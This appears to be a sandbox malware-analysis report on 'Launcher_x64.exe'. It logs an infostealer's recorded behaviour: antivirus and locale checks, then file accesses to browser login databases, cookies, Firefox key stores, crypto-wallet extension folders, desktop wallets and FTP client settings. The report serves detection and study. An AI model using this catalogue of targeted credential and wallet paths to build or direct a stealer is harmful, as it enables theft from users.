                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D7AA37
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D763F5
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D7AC88
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D7AD30
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D7AFF0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D7AF83
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D7B0C5
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D768FD
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00D7B1B7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D7B110
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D7B2BD
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00D7AA37
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D763F5
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D7AC88
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00D7AD30
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D7AFF0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D7AF83
                Source: C:\Users\user\Desktop\Launcher_x64.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D6A335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D6A335
                Source: C:\Users\user\Desktop\Launcher_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Launcher_x64.exe, 00000003.00000003.1826260410.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003003000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858167471.000000000571B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835630979.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826186870.0000000005715000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826421624.000000000305B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.000000000303A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 7372, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Launcher_x64.exeString found in binary or memory: %appdata%\Electrum\wallets
                Source: Launcher_x64.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Launcher_x64.exeString found in binary or memory: Wallets/JAXX New Version
                Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Launcher_x64.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Launcher_x64.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":x
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
